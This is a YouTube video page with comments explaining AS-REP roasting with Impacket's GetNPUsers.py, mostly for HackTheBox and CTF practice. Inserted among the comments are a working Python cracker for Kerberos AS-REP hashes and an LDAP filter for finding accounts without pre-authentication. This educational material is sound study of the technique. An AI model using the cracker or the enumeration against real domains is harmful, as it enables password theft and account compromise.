Taking a look at the Impacket GetNPUsers.py script and explaining a little bit about Kerberos pre-authentication. Impacket: www.secureauth... Kerberos RFC: tools.ietf.org... My blog: vbscrub.com
Comments: 67
@vbscrub (4 years ago)
2:00 - Using GetNPUsers to get encrypted data 3:43 - Cracking the password in hashcat 5:12 - Explaining what makes an account vulnerable to this script 7:29 - LDAP query to find vulnerable users 11:04 - Wireshark capture of kerberos traffic when we run the script 15:05 - Explaining what kerberos pre authentication is 17:50 - Summary
@cbesc (2 years ago)
Gold mine of a channel. The way you explain it takes me back to the 2600 quarterly days.
@flo97ist (4 years ago)
Great video, really looking forward to that Active Directory one. I like that you mention the real-world relevance.
@MohdAnees-rv7te (2 years ago)
Your videos have a lot of depth. It makes it easier for me to remember, as all put together it makes sense. Thank you, and please keep posting more videos.
@isitreally (4 years ago)
Great job man. I've always wanted to see how the bad configuration that we exploit actually looks from the other side. Looking forward to more of your videos. Cheers!
@mikemutter4521 (1 year ago)
Your videos are great! Clear, understandable and precise! Thanks for the time you put into this; it's helping me get ready for the OSCP.
@vbscrub (1 year ago)
No worries, glad it helped.
@georgegreen9145 (4 years ago)
Now that you explained it, it seems so obvious. In the HTB forums people gave the hint of using Impacket. Most scripts I tried required the user's password and that put me off. Come to find out I missed out on this important script. Great video mate! More AD videos please.
@vbscrub (4 years ago)
Yeah, it's one of those things that you either know about or you don't. The first time I had to use it on a HTB box I felt like it was pretty harsh, as there's no hint that that's what you need to do. But I guess it teaches you to always just try these things anyway.
@steps0x029a (4 years ago)
Thanks for sharing this video! That really helped me understand why GetNPUsers actually works and what it looks like from the other side. Next up is your AD video; guess I'll learn quite a lot from that (as I don't know that much about AD). Thanks again, talk to you on HTB later.
@tech0494 (3 years ago)
More videos please ❤️❤️
@mohamedraheem1050 (4 years ago)
Thanks bro, so informative. I would like to see more of these explanatory videos for CTF and exploitation tools and how they work.
@vbscrub (4 years ago)
Thanks, and yeah, there will be more videos like this coming soon :)
@cybersamurai99 (3 months ago)
This was useful, thank you.
@pauliehorgan (4 years ago)
Nice video. It should explain to people why they are running that script instead of them just doing it automatically.
@hxmo656 (4 years ago)
Really loved this video man, it helped me understand AD more and I finally understand the syntax for GetNPUsers lol. Definitely make another AD video on post-exploitation to get DA! Cheers.
@ProCipher (4 years ago)
I paused the video more than 3 times to give a like :) GJ & thanks bro.
@caiochaves9550 (4 years ago)
Great video!!
@ibrahimalnafisi432 (3 years ago)
Amazing. Thanks
@nopnopnopnopnopnopnop (3 years ago)
Thank you!
@teamgoogle2713 (2 years ago)
Hi! Your videos are amazing and I'm glad I finally found someone who goes into as much depth as I need. You're brilliant, man. Never stop posting. You honestly leave no room for doubts because you're so detailed with everything, and you have no idea how much an overthinker like me appreciates that. I just had one question: were you able to figure out how hashcat/John the Ripper work behind the scenes to actually crack the password? I've been hammering my head trying to find that out but it's just a rabbit hole. Could you please help me out with this?
@vbscrub (2 years ago)
I found out roughly how it works, yeah. It looks for specific values in specific locations that are always the same once decrypted. So say the 10th byte in the data always has a value of 80 when the data has been decrypted; it can keep checking for that value after it tries every potential password in the word list, and when it sees that value then it knows it has the correct password. Obviously it's normally based on more than just one byte so that it's more reliable, but yeah, that's basically it. If you look at the hashcat source code on GitHub you can see the actual values it checks for are mentioned in a comment: github.com/hashcat/hashcat/blob/master/OpenCL/m18200_a0-pure.cl
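The decrypt-and-check loop described in this reply, as an added example (this is not code from the video, from Impacket or from hashcat). It rebuilds the RC4-HMAC (etype 23) arithmetic behind a `$krb5asrep$23$` line: the part of the AS-REP that GetNPUsers extracts is the enc-part, which the KDC encrypts under the user's own key (the NT hash of the password), so each guess is "derive key, decrypt, verify". It assumes key usage 8 for the AS-REP enc-part, carries its own MD4 as a fallback for OpenSSL builds without md4, and constructs a fake AS-REP to crack; the user jsmith, realm CORP.LOCAL, password, confounder, EncASRepPart body and wordlist are all made up for the demo. The HMAC check is what proves a guess; the fixed-byte check of the ASN.1 tags is shown alongside it because that is the kind of shortcut the reply describes.

```python
import hashlib
import hmac
import struct

# Added example, not code from the video, Impacket or hashcat. Re-creates the RC4-HMAC
# (etype 23, RFC 4757) maths behind a $krb5asrep$23$ line. The user, realm, confounder,
# EncASRepPart body and wordlist below are all constructed for the demo.

AS_REP_ENC_PART_USAGE = 8  # key usage applied to the AS-REP enc-part (assumption: as hashcat 18200 does)
M32 = 0xFFFFFFFF
hmac_md5 = lambda key, msg: hmac.new(key, msg, hashlib.md5).digest()

def md4(data):
    """Pure-Python MD4 (RFC 1320) fallback; many OpenSSL 3 builds ship without md4."""
    rot = lambda x, n: ((x << n) | (x >> (32 - n))) & M32
    rounds = (  # (boolean function, additive constant, shifts, message-word order)
        (lambda x, y, z: (x & y) | (~x & z), 0, (3, 7, 11, 19), range(16)),
        (lambda x, y, z: (x & y) | (x & z) | (y & z), 0x5A827999, (3, 5, 9, 13),
         (0, 4, 8, 12, 1, 5, 9, 13, 2, 6, 10, 14, 3, 7, 11, 15)),
        (lambda x, y, z: x ^ y ^ z, 0x6ED9EBA1, (3, 9, 11, 15),
         (0, 8, 4, 12, 2, 10, 6, 14, 1, 9, 5, 13, 3, 11, 7, 15)))
    msg = data + b"\x80" + b"\x00" * ((55 - len(data)) % 64) + struct.pack("<Q", 8 * len(data))
    a, b, c, d = 0x67452301, 0xEFCDAB89, 0x98BADCFE, 0x10325476
    for off in range(0, len(msg), 64):
        X, (aa, bb, cc, dd) = struct.unpack("<16I", msg[off:off + 64]), (a, b, c, d)
        for fn, k, shifts, order in rounds:
            for i, w in enumerate(order):
                a = rot((a + fn(b, c, d) + X[w] + k) & M32, shifts[i % 4])
                a, b, c, d = d, a, b, c
        a, b, c, d = (a + aa) & M32, (b + bb) & M32, (c + cc) & M32, (d + dd) & M32
    return struct.pack("<4I", a, b, c, d)

def ntlm_hash(password):
    """The RC4-HMAC Kerberos key *is* the NT hash: MD4(UTF-16LE(password))."""
    data = password.encode("utf-16-le")
    try:
        return hashlib.new("md4", data).digest()
    except ValueError:  # md4 not available in this OpenSSL build
        return md4(data)

def rc4(key, data):
    S, j = list(range(256)), 0
    for i in range(256):  # key scheduling
        j = (j + S[i] + key[i % len(key)]) & 0xFF
        S[i], S[j] = S[j], S[i]
    out, i, j = bytearray(), 0, 0
    for byte in data:  # keystream generation
        i = (i + 1) & 0xFF
        j = (j + S[i]) & 0xFF
        S[i], S[j] = S[j], S[i]
        out.append(byte ^ S[(S[i] + S[j]) & 0xFF])
    return bytes(out)

def rc4_hmac_encrypt(key, usage, confounder, data):
    """RFC 4757 encryption: checksum || RC4(K3, confounder || data)."""
    k1 = hmac_md5(key, struct.pack("<I", usage))
    edata = confounder + data
    checksum = hmac_md5(k1, edata)  # K2 == K1 for non-export keys
    return checksum + rc4(hmac_md5(k1, checksum), edata)

def rc4_hmac_decrypt(key, usage, blob):
    """Plaintext with the 8-byte confounder stripped, or None when the HMAC does not verify."""
    k1 = hmac_md5(key, struct.pack("<I", usage))
    checksum, ciphertext = blob[:16], blob[16:]
    edata = rc4(hmac_md5(k1, checksum), ciphertext)
    return edata[8:] if hmac.compare_digest(hmac_md5(k1, edata), checksum) else None

def format_asrep_hash(user, realm, blob):
    """Same layout GetNPUsers prints: $krb5asrep$23$user@REALM:<checksum>$<ciphertext>."""
    return "$krb5asrep$23$%s@%s:%s$%s" % (user, realm, blob[:16].hex(), blob[16:].hex())

def looks_like_enc_as_rep_part(plain):
    """Fixed-byte check of the kind the reply describes: EncASRepPart is [APPLICATION 25]
    (tag 0x79) wrapping a SEQUENCE (0x30). The HMAC check is the authoritative one."""
    if len(plain) < 4 or plain[0] != 0x79:
        return False
    n = 1 if plain[1] < 0x80 else 1 + (plain[1] & 0x7F)  # number of DER length octets
    return len(plain) > 1 + n and plain[1 + n] == 0x30

def crack_asrep(hashline, wordlist):
    """Offline guess loop: NT hash of each candidate, decrypt, accept on HMAC plus structure."""
    _principal, rest = hashline[len("$krb5asrep$23$"):].split(":", 1)
    checksum_hex, ciphertext_hex = rest.split("$", 1)
    blob = bytes.fromhex(checksum_hex) + bytes.fromhex(ciphertext_hex)
    for candidate in wordlist:
        plain = rc4_hmac_decrypt(ntlm_hash(candidate), AS_REP_ENC_PART_USAGE, blob)
        if plain is not None and looks_like_enc_as_rep_part(plain):
            return candidate
    return None

# Constructed sample (not a real capture): a dummy EncASRepPart with the right outer tags.
SAMPLE_PASSWORD = "Summer2019!"
_body = b"\xa0\x03\x02\x01\x17" + b"\x00" * 40                          # dummy EncKDCRepPart contents
_seq = b"\x30" + bytes([len(_body)]) + _body                            # SEQUENCE
SAMPLE_ENC_AS_REP_PART = b"\x79" + bytes([len(_seq)]) + _seq            # [APPLICATION 25]
SAMPLE_HASH = format_asrep_hash("jsmith", "CORP.LOCAL", rc4_hmac_encrypt(
    ntlm_hash(SAMPLE_PASSWORD), AS_REP_ENC_PART_USAGE, bytes(range(8)), SAMPLE_ENC_AS_REP_PART))
WORDLIST = ["password", "Welcome1", SAMPLE_PASSWORD, "P@ssw0rd"]       # constructed wordlist
```

Running `crack_asrep(SAMPLE_HASH, WORDLIST)` returns the planted password; swap `SAMPLE_HASH` for a real `$krb5asrep$23$` line from GetNPUsers and a real wordlist and the same loop applies, only far slower than hashcat because it recomputes MD4 and two HMACs per guess in pure Python.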
@gizmet6467 (4 years ago)
This is perfect! thank you for the video VB! :)
@raghav7633 (4 years ago)
Amazing video. Paused in between just to subscribe and like. Hope to see more content. Just a suggestion: you could start a series for noobs like me who just shifted their focus from Linux priv esc to Windows.
@vbscrub (4 years ago)
Thanks :) I did do an hour-long video introducing people like yourself to Active Directory, so take a look at that one if you've not seen it already. It's called AD Basics.
@MayankMalhotra-ig6vl (1 year ago)
The best!!!!!!!!!!!!!!!!!!!
@stevieberg2540 (4 years ago)
Thanks for the video! Really helped for a Hackthebox challenge. Subscribed and will watch the other videos cause they seem interesting.
@vbscrub (4 years ago)
Cheers, glad to hear that.
@dojoku88 (4 years ago)
Thanks a lot VB. This is perfect!
@SP-hz5tp (4 years ago)
Awesome! Please consider creating more of those explanations of common tools and techniques! Subscribed! P.S.: Could you cover silver and golden tickets or some more Kerberos in general...
@vbscrub (4 years ago)
Thanks! And yeah, that's a good idea; a quick video explaining golden tickets would be easy enough to do.
@SP-hz5tp (4 years ago)
VbScrub Nice! Appreciate it! :)
@CarricDooley (4 years ago)
Great content! "Waffling on" was not a problem at all! =)
@swift87100 (4 years ago)
Great job dude!! You earned a subscriber!!
@CodeXND (4 years ago)
Thank you, very informative.
@vbscrub (4 years ago)
No problem :) more coming soon.
@whitefighter5928 (4 years ago)
Great job!
@jumpstep7085 (4 years ago)
Damn it, that's very surprising. I didn't realize it didn't reflect a real-world situation. If not this, what do you think are the most commonly exploited Windows/Windows Active Directory vulnerabilities when it comes to getting a foothold?? Thanks heaps for the video @VBScrub
@CatSmiling (4 years ago)
ty for this brah
@robinhood3841 (2 years ago)
2:24 When we specify a valid user on the domain, don't we get more results compared to an anonymous user? I mean, I encountered CTF machines where I wasn't able to perform this attack unless I had a valid user on the domain, which gives me access to more users.
@soumyanilbiswas_reveng007 (3 years ago)
Sir, I'm still confused about AS-REP roasting. We are capturing the TGT, and the TGT is encrypted with the krbtgt LT key. So after cracking the hash, should we not get the real password of the krbtgt service account rather than user account passwords?? When I saw your theory video, I saw that the TGT is encrypted with the krbtgt account password, but when I did the practical in my home lab, I saw the same thing: that I got password hashes of users which have pre-auth disabled... What am I lacking???
@dharanisanjaiy (1 year ago)
See the 19:12 timestamp. He is requesting the hash for the jsmith user, so the KDC will encrypt the TGT key with jsmith's password. That's why we are able to retrieve jsmith's password. Whereas for other users, the KDC needs their password to encrypt; that's why it showed an error.
@kasireddyvenki5421 (4 years ago)
Good video bro.
@westernvibes1267 (4 years ago)
Amazing work explaining why and when to use these. I was so lost and confused by these tools. By the way, can you tell me how to extract GPP passwords when you get access to SYSVOL shares? I mean, do you just search through it manually, or is there a tool?
@vbscrub (4 years ago)
There are tools that get the GPP passwords, yeah. Just google it and you'll find some PowerShell scripts that do it.
@nicksmith5654 (4 years ago)
Hey, I could use your help! I'm trying to run GetNPUsers with a -usersfile flag and end up here --> GetNPUsers.py: error: unrecognized arguments: -usersfile user.txt ... I can't seem to find -usersfile in the usage options --> usage: GetNPUsers.py [-h] [-request] [-outputfile OUTPUTFILE] [-debug] [-hashes LMHASH:NTHASH] [-no-pass] [-k] [-aesKey hex key] [-dc-ip ip address] target. What do you think? Thank you in advance!
@frankdSda (4 years ago)
What do you do to run the Python script directly from cmd without using the header line "python3 name.py", for example? AND NICE VIDEO!!!!
@urnotalone69 (3 years ago)
The fun thing is that you explained all of this but forgot to explain and show how to download it xd
@lonixlon (3 years ago)
So I guess hashcat tries to decrypt the data with all the keys in the wordlist until non-garbage is returned?
@SnakePlissken1 (2 years ago)
Dude, how did you get this to run on Windows? C:> is DOS??
@jonathancsoy (4 years ago)
Well... still not working for me. The same error appears. Can you please write the syntax for Linux?
@6cylbmw (4 years ago)
I just tried what you said in the video (using the script with and without specifying usernames) on a HTB machine, but it does not work when I'm not specifying the username.
@vbscrub (4 years ago)
Depends which machine. On one of the currently live machines you can do it without specifying a username and it will find a result, because anonymous logon has permission to view everything in AD. On another one you need the username, because anonymous logon does not have permission to view the user account that has this option set, so the LDAP query the script runs will not find any results.
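The LDAP side of this, as an added example (not code from the video or from Impacket): it builds a search filter with the three conditions GetNPUsers.py's own search uses (the DONT_REQ_PREAUTH bit set in userAccountControl, the account not disabled, and not a computer object) and then evaluates the same test client-side over a constructed set of directory entries, so it runs offline with no domain. The account names and userAccountControl values are made up; the entry with no readable userAccountControl stands in for the case described in the reply, where the bind you are using cannot see the account and the search therefore returns nothing for it.

```python
# Added example, not code from the video or from Impacket. The userAccountControl test behind
# the LDAP search GetNPUsers.py runs, applied to constructed entries (no live domain involved).

UF_ACCOUNTDISABLE = 0x0002
UF_NORMAL_ACCOUNT = 0x0200
UF_WORKSTATION_TRUST_ACCOUNT = 0x1000
UF_DONT_EXPIRE_PASSWD = 0x10000
UF_DONT_REQUIRE_PREAUTH = 0x400000  # the "Do not require Kerberos preauthentication" checkbox
LDAP_MATCHING_RULE_BIT_AND = "1.2.840.113556.1.4.803"  # bitwise-AND extensible match rule

UAC_FLAG_NAMES = {
    UF_ACCOUNTDISABLE: "ACCOUNTDISABLE",
    UF_NORMAL_ACCOUNT: "NORMAL_ACCOUNT",
    UF_WORKSTATION_TRUST_ACCOUNT: "WORKSTATION_TRUST_ACCOUNT",
    UF_DONT_EXPIRE_PASSWD: "DONT_EXPIRE_PASSWD",
    UF_DONT_REQUIRE_PREAUTH: "DONT_REQUIRE_PREAUTH",
}

def decode_uac(uac):
    """Names of the known flags set in a userAccountControl value (other bits are ignored)."""
    return [name for bit, name in UAC_FLAG_NAMES.items() if uac & bit]

def asrep_roastable_filter():
    """Filter with the three conditions the script searches for: pre-auth not required,
    account not disabled, not a computer object."""
    return ("(&(userAccountControl:%s:=%d)(!(userAccountControl:%s:=%d))(!(objectCategory=computer)))"
            % (LDAP_MATCHING_RULE_BIT_AND, UF_DONT_REQUIRE_PREAUTH,
               LDAP_MATCHING_RULE_BIT_AND, UF_ACCOUNTDISABLE))

def is_asrep_roastable(entry):
    """Client-side equivalent of the filter for one entry (a dict of attributes). An entry whose
    userAccountControl the bind could not read is treated as not matching, which is what an
    anonymous search against a locked-down domain looks like."""
    uac = entry.get("userAccountControl")
    if uac is None:
        return False
    return bool(uac & UF_DONT_REQUIRE_PREAUTH) and not (uac & UF_ACCOUNTDISABLE) \
        and entry.get("objectCategory") != "computer"

def find_asrep_roastable(entries):
    return [e["sAMAccountName"] for e in entries if is_asrep_roastable(e)]

# Constructed entries, shaped like search results (objectCategory shortened to its class name).
SAMPLE_ENTRIES = [
    {"sAMAccountName": "jsmith", "objectCategory": "person",
     "userAccountControl": UF_NORMAL_ACCOUNT | UF_DONT_EXPIRE_PASSWD | UF_DONT_REQUIRE_PREAUTH},
    {"sAMAccountName": "administrator", "objectCategory": "person",
     "userAccountControl": UF_NORMAL_ACCOUNT},                                    # pre-auth required
    {"sAMAccountName": "oldsvc", "objectCategory": "person",
     "userAccountControl": UF_NORMAL_ACCOUNT | UF_ACCOUNTDISABLE | UF_DONT_REQUIRE_PREAUTH},  # disabled
    {"sAMAccountName": "WS01$", "objectCategory": "computer",
     "userAccountControl": UF_WORKSTATION_TRUST_ACCOUNT | UF_DONT_REQUIRE_PREAUTH},  # computer
    {"sAMAccountName": "hidden", "objectCategory": "person"},                        # UAC not readable
]

if __name__ == "__main__":
    print(asrep_roastable_filter())
    for entry in SAMPLE_ENTRIES:
        print("%-14s %s" % (entry["sAMAccountName"], decode_uac(entry.get("userAccountControl", 0))))
    print("roastable:", find_asrep_roastable(SAMPLE_ENTRIES))
```

Only jsmith comes back: administrator lacks the flag, oldsvc is disabled, WS01$ is a computer, and "hidden" has no readable userAccountControl. That last case is the "No entries found" situation: the account may well be roastable, but not visible to the bind you used, which is why retrying with domain/username instead of domain/ can change the result.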
@sva8420 (4 years ago)
When I'm using GetNPUsers I get "No entries found!"
@6cylbmw (4 years ago)
Great one. It feels like you are a little rushed, and considering what you said in the last videos I suppose you are afraid your videos may be too long. Tbh, for me they could be even hours long if you feel that would be needed. I'm really looking forward to the AD video.
@vbscrub (4 years ago)
Thanks for the feedback I'll bear that in mind for the next one, cheers
@vbscrub (4 years ago)
Maybe there are no accounts with Kerberos pre-auth disabled in the domain you are running it against? Either that, or there are some accounts but you do not have permission to view them. On some of the CTF machines I've done, you need to know the username of the user first. Then you run it with domain.local/username instead of just domain.local/
@sva8420 (4 years ago)
@vbscrub I tried this and I got "Password: [*] Cannot authenticate administrator, getting its TGT [-] User administrator doesn't have UF_DONT_REQUIRE_PREAUTH set"
@sva8420 (4 years ago)
Coming from the "S@un@ server HTB" :\ if you know what I mean